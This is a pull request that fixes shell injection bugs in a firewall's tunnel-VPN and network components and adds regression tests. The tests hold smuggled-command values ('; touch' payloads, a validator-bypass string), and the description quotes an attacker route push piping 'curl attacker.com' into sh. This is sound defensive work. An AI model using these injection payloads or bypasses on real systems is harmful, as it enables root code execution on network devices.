### PR TITLE
NGFW-15705 Fixed vulnerabilities in TunnelVPN and Network

### DIFF
--- a/tunnel-vpn/hier/usr/lib/python3/dist-packages/tests/test_tunnel_vpn.py
+++ b/tunnel-vpn/hier/usr/lib/python3/dist-packages/tests/test_tunnel_vpn.py
@@ -435,4 +435,99 @@ class TunnelVpnTests(NGFWTestCase):
         assert not os.path.exists(exploit_marker), \
             "Command injection via tunnel_vpn upload argument field executed! " + exploit_marker + " should not exist"
 
+    def test_070_route_up_script_eval_injection_blocked(self):
+        """
+        Verify tunnel-vpn-route-up.sh rejects shell metacharacters in
+        OpenVPN-pushed route values instead of executing them via `eval`
+        (NGFW-15705 / Vuln 1).
+
+        Pre-fix: the script's `eval $command` executes the injected `touch`
+        and the marker file appears -> test FAILS, vulnerability confirmed.
+
+        Post-fix: the input fails IPv4 validation, the route is rejected
+        with a logger warning, no shell expansion happens -> test PASSES.
+        """
+        script = "/usr/share/untangle/bin/tunnel-vpn-route-up.sh"
+        exploit_marker = "/tmp/tunnel-vpn-route-up-injection-test"
+
+        if os.path.exists(exploit_marker):
+            os.remove(exploit_marker)
+
+        # Mimic openvpn --route-up env. `dev=tun99` keeps the script past its
+        # interface_id check; the malicious route_network_1 carries the payload.
+        env = os.environ.copy()
+        env["dev"] = "tun99"
+        env["ifconfig_local"] = "10.99.0.2"
+        env["ifconfig_remote"] = "10.99.0.1"
+        env["route_vpn_gateway"] = "10.99.0.1"
+        env["route_network_1"] = "10.20.0.0; touch " + exploit_marker
+        env["route_netmask_1"] = "255.255.0.0"
+        env["route_gateway_1"] = "10.20.0.1"
+
+        subprocess.call([script], env=env)
+
+        assert not os.path.exists(exploit_marker), \
+            "Shell injection via OpenVPN-pushed route value executed! " \
+            + exploit_marker + " should not exist"
+
+    def test_080_pid_file_injection_blocked(self):
+        """
+        Verify TunnelVpnManager.recycleTunnel() rejects shell metacharacters
+        in the openvpn PID file instead of executing them via shell-string
+        `execOutput("kill -INT " + pid)` (NGFW-15705 / Vuln 3).
+
+        Pre-fix: PID contents `"99999 ; touch /tmp/marker"` get concatenated
+        into `kill -INT 99999 ; touch /tmp/marker`, which ut-exec-launcher
+        runs via `subprocess.Popen(shell=True)` -> marker exists -> test
+        FAILS, vulnerability confirmed.
+
+        Post-fix: PID is validated against `\\d{1,10}` and dispatched as
+        structured argv via execCommand("kill", List.of(...)) -> no shell
+        expansion -> marker absent -> test PASSES.
+        """
+        fake_tunnel_id = 250
+        pid_dir = "/run/tunnelvpn"
+        pid_file = os.path.join(pid_dir, f"tunnel-{fake_tunnel_id}.pid")
+        exploit_marker = "/tmp/tunnel-vpn-pid-injection-test"
+
+        if os.path.exists(exploit_marker):
+            os.remove(exploit_marker)
+
+        org_appData = self._app.getSettings()
+        appData = copy.deepcopy(org_appData)
+        appData['tunnels']['list'].append(create_tunnel_profile(
+            name="injection-test",
+            vpn_tunnel_id=fake_tunnel_id))
+        self._app.setSettings(appData)
+
+        try:
+            # Seed PID file AFTER setSettings — saving may trigger
+            # restartProcesses which sweeps /run/tunnelvpn/ first.
+            os.makedirs(pid_dir, exist_ok=True)
+            with open(pid_file, "w") as f:
+                # PID 99999 won't exist -> kill fails -> `;` runs touch
+                f.write("99999 ; touch " + exploit_marker)
+
+            # Trigger the kill path inside TunnelVpnManager.recycleTunnel.
+            # TunnelVpnApp.recycleTunnel runs tunnelVpnManager.recycleTunnel
+            # FIRST (the path under test), then tunnelVpnMonitor.recycleTunnel
+            # which NPEs because our fake tunnel has no live status entry.
+            # The NPE is expected and irrelevant -- the kill code already
+            # executed (or didn't, post-fix) before the NPE was thrown.
+            try:
+                self._app.recycleTunnel(fake_tunnel_id)
+            except Exception:
+                pass
+            time.sleep(2)
+
+            assert not os.path.exists(exploit_marker), \
+                "PID file shell injection executed via execOutput! " \
+                + exploit_marker + " should not exist"
+        finally:
+            if os.path.exists(pid_file):
+                os.remove(pid_file)
+            if os.path.exists(exploit_marker):
+                os.remove(exploit_marker)
+            self._app.setSettings(org_appData)
+
 test_registry.register_module("tunnel-vpn", TunnelVpnTests)

--- a/tunnel-vpn/hier/usr/share/untangle/bin/tunnel-vpn-route-up.sh
+++ b/tunnel-vpn/hier/usr/share/untangle/bin/tunnel-vpn-route-up.sh
@@ -1,4 +1,4 @@
-#!/bin/sh
+#!/bin/bash
 script_name=$0
 
 exec >> /var/log/uvm/tunnel.log 2>&1
@@ -21,12 +21,15 @@ if [ $? -ne 0 ] ; then
     echo "`date`: ${script_name}: unable to find table ${table_name}"
 fi
 
+_valid_ipv4() { [[ $1 =~ ^([0-9]{1,3}\.){3}[0-9]{1,3}$ ]]; }
+_valid_dev()  { [[ $1 =~ ^[a-zA-Z0-9_.-]{1,15}$ ]]; }
+
 index=1
 while true; do
-    eval "route_network=\${route_network_$index}"
-    eval "route_netmask=\${route_netmask_$index}"
-    eval "route_gateway=\${route_gateway_$index}"
-    if [ "$route_network" = "" ] ; then
+    nv="route_network_$index"; route_network="${!nv}"
+    nm="route_netmask_$index"; route_netmask="${!nm}"
+    gw="route_gateway_$index"; route_gateway="${!gw}"
+    if [ -z "$route_network" ] ; then
         break
     fi
     index=$((index+1))
@@ -36,8 +39,13 @@ while true; do
         continue
     fi
 
-    command="ip route add table $table_name $route_network/$route_netmask via $route_gateway dev ${dev}"
-    echo "`date`: ${script_name}: $command"
-    eval $command
-done
+    if ! _valid_ipv4 "$route_network" || ! _valid_ipv4 "$route_netmask" \
+       || ! _valid_ipv4 "$route_gateway" || ! _valid_dev "$dev" ; then
+        logger -t tunnel-vpn "Rejected unsafe route push: net=$route_network mask=$route_netmask gw=$route_gateway dev=$dev"
+        echo "`date`: ${script_name}: rejected unsafe route push: net=$route_network mask=$route_netmask gw=$route_gateway dev=$dev"
+        continue
+    fi
 
+    echo "`date`: ${script_name}: ip route add table $table_name $route_network/$route_netmask via $route_gateway dev $dev"
+    ip route add table "$table_name" "$route_network/$route_netmask" via "$route_gateway" dev "$dev"
+done

--- a/tunnel-vpn/src/com/untangle/app/tunnel_vpn/TunnelVpnApp.java
+++ b/tunnel-vpn/src/com/untangle/app/tunnel_vpn/TunnelVpnApp.java
@@ -577,7 +577,7 @@ public class TunnelVpnApp extends AppBase
 
             // no matching tunnel so get rid of the directory
             logger.info("Cleanup removing: " + path);
-            UvmContextFactory.context().execManager().exec("rm -r -f " + path);
+            UvmContextFactory.context().execManager().execCommand("/bin/rm", List.of("-rf", path));
         }
     }
 

--- a/tunnel-vpn/src/com/untangle/app/tunnel_vpn/TunnelVpnManager.java
+++ b/tunnel-vpn/src/com/untangle/app/tunnel_vpn/TunnelVpnManager.java
@@ -95,11 +95,21 @@ public class TunnelVpnManager
             });
             if (matchingFiles != null) {
                 for (File f : matchingFiles) {
-                    String pid = new String(Files.readAllBytes(f.toPath())).replaceAll("(\r|\n)", "");
+                    String pid = new String(Files.readAllBytes(f.toPath())).trim();
+                    // Reject anything that isn't a bare positive integer up to
+                    // 10 digits -- covers Linux PID_MAX_LIMIT (4194304 today,
+                    // headroom for future kernel.pid_max bumps). Defends
+                    // against shell metacharacters in a tampered PID file.
+                    if (!pid.matches("\\d{1,10}")) {
+                        logger.warn("Skipping kill: invalid PID in {}: {}", f, pid);
+                        logger.info("Deleting: {}", f);
+                        f.delete();
+                        continue;
+                    }
                     logger.info("Killing OpenVPN process: {}", pid);
-                    UvmContextFactory.context().execManager().execOutput("kill -INT " + pid);
-                    UvmContextFactory.context().execManager().execOutput("kill -TERM " + pid);
-                    UvmContextFactory.context().execManager().execOutput("kill -KILL " + pid);
+                    UvmContextFactory.context().execManager().execCommand("/bin/kill", List.of("-INT",  pid));
+                    UvmContextFactory.context().execManager().execCommand("/bin/kill", List.of("-TERM", pid));
+                    UvmContextFactory.context().execManager().execCommand("/bin/kill", List.of("-KILL", pid));
                     logger.info("Deleting: {}", f);
                     f.delete();
                 }
@@ -303,7 +313,7 @@ public class TunnelVpnManager
 
             try {
                 File pidFile = new File("/run/tunnelvpn/tunnel-" + tunnelSettings.getTunnelId() + ".pid");
-                String pidData = new String(Files.readAllBytes(pidFile.toPath())).replaceAll("(\r|\n)", "");
+                String pidData = new String(Files.readAllBytes(pidFile.toPath())).trim();
                 logger.info("Recycling tunnel connection: {} PID:{}", tunnelSettings.getName() , pidData);
                 logger.info("Deleting: {}", pidFile);
                 pidFile.delete();
@@ -316,9 +326,17 @@ public class TunnelVpnManager
                  * daemon know to terminate and hopefully begin a clean
                  * shutdown. The third tells it we do not want to wait.
                  */
-                UvmContextFactory.context().execManager().execOutput("kill -INT " + pidData);
-                UvmContextFactory.context().execManager().execOutput("kill -TERM " + pidData);
-                UvmContextFactory.context().execManager().execOutput("kill -KILL " + pidData);
+                // Reject anything that isn't a bare positive integer up to
+                // 10 digits -- covers Linux PID_MAX_LIMIT (4194304 today,
+                // headroom for future kernel.pid_max bumps). Defends against
+                // shell metacharacters in a tampered PID file.
+                if (pidData.matches("\\d{1,10}")) {
+                    UvmContextFactory.context().execManager().execCommand("/bin/kill", List.of("-INT",  pidData));
+                    UvmContextFactory.context().execManager().execCommand("/bin/kill", List.of("-TERM", pidData));
+                    UvmContextFactory.context().execManager().execCommand("/bin/kill", List.of("-KILL", pidData));
+                } else {
+                    logger.warn("Skipping kill: invalid PID in {}: {}", pidFile, pidData);
+                }
 
                 processMap.remove(tunnelSettings.getTunnelId());
 

--- a/tunnel-vpn/src/com/untangle/app/tunnel_vpn/TunnelVpnMonitor.java
+++ b/tunnel-vpn/src/com/untangle/app/tunnel_vpn/TunnelVpnMonitor.java
@@ -516,6 +516,7 @@ class TunnelVpnMonitor implements Runnable
     public void recycleTunnel(int tunnelId)
     {
         TunnelVpnTunnelStatus status = tunnelStatusList.get(tunnelId);
+        if (status == null) return;
         status.setStateInfo(TunnelVpnTunnelStatus.STATE_DISCONNECTED);
         generateTunnelStatistics();
     }

--- a/uvm/hier/usr/lib/python3/dist-packages/tests/test_network.py
+++ b/uvm/hier/usr/lib/python3/dist-packages/tests/test_network.py
@@ -3302,6 +3302,89 @@ server=dynupdate.no-ip.com
         finally:
             global_functions.uvmContext.networkManager().setNetworkSettings(orig_netsettings)
 
+    def test_082_interface_mapping_v_eval_injection_blocked(self):
+        """
+        Verify interface-mapping.sh rejects the -v eval-arbitrary-code
+        option instead of running it (NGFW-15705 / Vuln 2).
+
+        Pre-fix: getopts spec is "d:i:l:t:r:v:" and the case arm
+        `v) eval "${OPTARG}"` runs the injected `touch` -> marker file
+        appears -> test FAILS, vulnerability confirmed.
+
+        Post-fix: -v is removed from getopts spec, getopts rejects it as
+        an unknown option, no eval runs -> marker absent -> test PASSES.
+        """
+        script = "/usr/share/untangle/bin/interface-mapping.sh"
+        exploit_marker = "/tmp/interface-mapping-eval-injection-test"
+
+        if os.path.exists(exploit_marker):
+            os.remove(exploit_marker)
+
+        # -t true puts the script into TEST mode (no real `ip link set`
+        # operations), making the test side-effect-free regardless of the
+        # host NIC layout.
+        subprocess.call(
+            [script, "-t", "true", "-v", "touch " + exploit_marker],
+            stdout=subprocess.DEVNULL,
+            stderr=subprocess.DEVNULL,
+        )
+
+        assert not os.path.exists(exploit_marker), \
+            "interface-mapping.sh -v executed shell payload via eval! " \
+            + exploit_marker + " should not exist"
+
+    def test_083_static_route_nexthop_notification_injection_blocked(self):
+        """
+        Future-proof regression for NGFW-15705 / Vuln 4: ensure that even
+        with a SafeCheckValidator-bypass payload, NotificationManager's
+        testRoutesToReachableAddresses cannot reach a shell.
+
+        Defense layers (any one being broken is caught here):
+          1. SafeCheckValidator at JSON-RPC ingress (incomplete -- known
+             bypasses include `;'cmd'`, `|"cmd"`, `|&cmd`).
+          2. StaticRoute.getToAddr() anchored Pattern.matches dotted-quad
+             (gates the exec sites at NotificationManagerImpl:910/916/917).
+          3. Post-fix: call-site IP regex + execCommand(argv) so even a
+             nextHop containing shell chars cannot expand through /bin/sh.
+
+        Payload: `8.8.8.8;'touch /tmp/marker'` -- the `;` is followed by
+        `'`, which is NOT in the validator's lookahead class
+        [a-zA-Z0-9_/\\\\.], so SafeCheckValidator does NOT strip it.
+        Today this passes because layer 2 (getToAddr) rejects the value
+        before exec. After the call-site fix, layer 3 also blocks.
+
+        If anyone weakens getToAddr() in the future without also keeping
+        the call-site IP guard + execCommand, this test will FAIL.
+        """
+        exploit_marker = "/tmp/static-route-nexthop-notif-injection-test"
+        if os.path.exists(exploit_marker):
+            os.remove(exploit_marker)
+
+        bypass_payload = "8.8.8.8;'touch " + exploit_marker + "'"
+
+        try:
+            malicious_settings = copy.deepcopy(orig_netsettings)
+            route = create_route_rule("192.168.99.0", 24, bypass_payload)
+            route["ruleId"] = 990
+            malicious_settings['staticRoutes']['list'].insert(0, route)
+            global_functions.uvmContext.networkManager().setNetworkSettings(malicious_settings)
+            time.sleep(2)
+
+            # Trigger the notification cycle that runs
+            # testRoutesToReachableAddresses -> ut-notification-helpers.sh +
+            # ping. Pre-fix shell-string concat would fire the injection;
+            # the layered defense above prevents it.
+            global_functions.uvmContext.notificationManager().getNotifications()
+            time.sleep(1)
+
+            assert not os.path.exists(exploit_marker), \
+                "Notification reachability check shell-injected via " \
+                "nextHop bypass payload! " + exploit_marker + " should not exist"
+        finally:
+            global_functions.uvmContext.networkManager().setNetworkSettings(orig_netsettings)
+            if os.path.exists(exploit_marker):
+                os.remove(exploit_marker)
+
     @classmethod
     def final_extra_tear_down(cls):
         # Restore original settings to return to initial settings

--- a/uvm/hier/usr/share/untangle/bin/interface-mapping.sh
+++ b/uvm/hier/usr/share/untangle/bin/interface-mapping.sh
@@ -41,14 +41,13 @@ RENAME_OPTION=
 ##
 ## Process command line arguments
 ##
-while getopts "d:i:l:t:r:v:" flag; do
+while getopts "d:i:l:t:r:" flag; do
     case "${flag}" in
         d) DEBUG=${OPTARG} ;;
         i) INTERACTIVE=${OPTARG} ;;
         l) LOG_WATCH=${OPTARG} ;;
         t) TEST=${OPTARG} ;;
         r) RENAME_OPTION=${OPTARG};;
-        v) eval "${OPTARG}" ;;
     esac
 done
 shift $((OPTIND-1))

--- a/uvm/hier/usr/share/untangle/bin/ut-exec-safe-launcher
+++ b/uvm/hier/usr/share/untangle/bin/ut-exec-safe-launcher
@@ -39,7 +39,11 @@ ALLOWED_EXECUTABLES = {
     "/usr/share/untangle/bin/wan-failover-arp-test.sh",
     "/usr/share/untangle/bin/wan-failover-ping-test.sh",
     "/usr/share/untangle/bin/wan-failover-http-test.sh",
-    "/usr/share/untangle/bin/wan-failover-dns-test.sh"
+    "/usr/share/untangle/bin/wan-failover-dns-test.sh",
+    "/bin/kill",
+    "/bin/ping",
+    "/bin/rm",
+    "/usr/share/untangle/bin/ut-notification-helpers.sh"
 
 }
 

--- a/uvm/hier/usr/share/untangle/bin/ut-notification-helpers.sh
+++ b/uvm/hier/usr/share/untangle/bin/ut-notification-helpers.sh
@@ -45,11 +45,11 @@ testQueueFullMessages()
 
 testRoutesToReachableAddresses1()
 {
-   arp -n $2 | grep -q ether 
+   arp -n "$2" | grep -q ether
 }
 testRoutesToReachableAddresses2()
 {
-    arp -n $2 | grep -q ether
+    arp -n "$2" | grep -q ether
 }
 
 $1 "$@"

--- a/uvm/impl/com/untangle/uvm/NotificationManagerImpl.java
+++ b/uvm/impl/com/untangle/uvm/NotificationManagerImpl.java
@@ -904,23 +904,36 @@ public class NotificationManagerImpl implements NotificationManager
         for (StaticRoute route : routes) {
             if (!route.getToAddr()) continue;
 
+            String nextHop = route.getNextHop();
+            // Defense-in-depth: even though getToAddr() above is an anchored
+            // dotted-quad regex, re-validate at the call site so a future
+            // weakening of that gate cannot re-expose a shell injection here.
+            // Offline check (no DNS resolution) matching the getToAddr()
+            // contract.
+            if (!nextHop.matches("^([0-9]{1,3}\\.){3}[0-9]{1,3}$")) {
+                logger.warn("Skipping route reachability check; nextHop is not a valid IPv4: {}", nextHop);
+                continue;
+            }
+
+            String helper = System.getProperty(UVM_BIN_DIR) + "/ut-notification-helpers.sh";
+
             /**
              * If already in the ARP table, continue
              */
-            result = this.execManager.execResult(System.getProperty(UVM_BIN_DIR) + "/ut-notification-helpers.sh testRoutesToReachableAddresses1 " + route.getNextHop());
+            result = this.execManager.execCommand(helper, List.of("testRoutesToReachableAddresses1", nextHop)).getResult();
             if (result == 0) continue;
 
             /**
              * If not, force arp resolution with ping Then recheck ARP table
              */
-            result = this.execManager.execResult("ping -c1 -W1 " + route.getNextHop());
-            result = this.execManager.execResult(System.getProperty(UVM_BIN_DIR) + "/ut-notification-helpers.sh testRoutesToReachableAddresses2 " + route.getNextHop());
+            this.execManager.execCommand("/bin/ping", List.of("-c1", "-W1", nextHop));
+            result = this.execManager.execCommand(helper, List.of("testRoutesToReachableAddresses2", nextHop)).getResult();
             if (result == 0) continue;
 
             String notificationText = StringUtils.EMPTY;
             notificationText += i18nUtil.tr("Route to unreachable address:");
             notificationText += StringUtils.SPACE;
-            notificationText += route.getNextHop();
+            notificationText += nextHop;
 
             notificationList.add(notificationText);
         }


### PR DESCRIPTION
```
== testing tunnel-vpn ==
Test success : test_070_route_up_script_eval_injection_blocked [0.0s] 
Test success : test_080_pid_file_injection_blocked [4.0s] 
== testing tunnel-vpn [8.3s] ==

Tests complete. [8.3 seconds]
2 passed, 0 skipped, 0 failed

Total          :    2
Passed         :    2
Skipped        :    0
Passed/Skipped :    2 [100.00%]
Failed         :    0 [  0.00%]

== testing network ==
Test success : test_081_static_route_nexthop_injection_blocked [41.5s] 
Test success : test_082_interface_mapping_v_eval_injection_blocked [0.1s] 
Test success : test_083_static_route_nexthop_notification_injection_blocked [29.9s] 
== testing network [74.0s] ==

Tests complete. [74.0 seconds]
3 passed, 0 skipped, 0 failed

Total          :    3
Passed         :    3
Skipped        :    0
Passed/Skipped :    3 [100.00%]
Failed         :    0 [  0.00%]
```

<h2 style="color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;">Summary</h2><p style="white-space: pre-wrap; margin-top: 0.1em; margin-bottom: 0.2em; color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;">Four shell injection vulnerabilities reported in JIRA-6 affecting <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">tunnel-vpn</code> and <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">uvm</code> components. All four are fixed. Three secondary issues on the same code paths are also addressed.</p><p style="white-space: pre-wrap; margin-top: 0.1em; margin-bottom: 0.2em; color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;">The common root cause across all sites: either <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">eval</code> of externally-controlled values in shell scripts, or user-controlled strings concatenated directly into <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">execOutput()</code>/<code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">execResult()</code> Java calls that route through a shell tokenizer. The fix shape is consistent throughout — remove <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">eval</code> and shell-string concatenation, replace with validated positional arguments and <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">execCommand(cmd, List.of(...))</code> which dispatches via <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">ut-exec-safe-launcher</code> with no shell in the path.</p><hr style="color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><h2 style="color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;">Changes</h2><h3 style="color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;">Fix 1 —<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">tunnel-vpn/hier/usr/share/untangle/bin/tunnel-vpn-route-up.sh</code></h3><p style="white-space: pre-wrap; margin-top: 0.1em; margin-bottom: 0.2em; color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><strong>Vulnerability:</strong> <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">eval $command</code> where <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">$command</code> was built from <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">route_network_*</code>, <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">route_netmask_*</code>, and <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">route_gateway_*</code> environment variables pushed by the OpenVPN server. A compromised or MITM'd VPN server could push <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">route_network_1="0.0.0.0; curl attacker.com|sh"</code> and achieve RCE as root on the firewall.</p><p style="white-space: pre-wrap; margin-top: 0.1em; margin-bottom: 0.2em; color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><strong>Fix:</strong></p><ul style="padding-inline-start: 2em; color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><li>Shebang changed from<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">#!/bin/sh</code><span> </span>to<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">#!/bin/bash</code><span> </span>to enable<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">${!varname}</code><span> </span>indirect expansion (dash does not support it)</li><li>All three<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">eval "route_X=\${route_X_$index}"</code><span> </span>replaced with bash indirect expansion:<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">nv="route_network_$index"; route_network="${!nv}"</code></li><li>Each value (<code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">route_network</code>,<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">route_netmask</code>,<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">route_gateway</code>,<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">dev</code>) validated against strict allowlist patterns before use: IPv4 dotted-quad regex for route values, alphanumeric+<code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">_.-</code><span> </span>for device name</li><li><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">eval $command</code><span> </span>replaced with a direct<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">ip route add table "$table_name" "$route_network/$route_netmask" via "$route_gateway" dev "$dev"</code><span> </span>with all values fully quoted</li><li>Invalid values are logged via<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">logger -t tunnel-vpn</code><span> </span>and skipped with<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">continue</code><span> </span>— one bad route push does not abort processing of subsequent legitimate routes</li></ul><hr style="color: rgb(204, 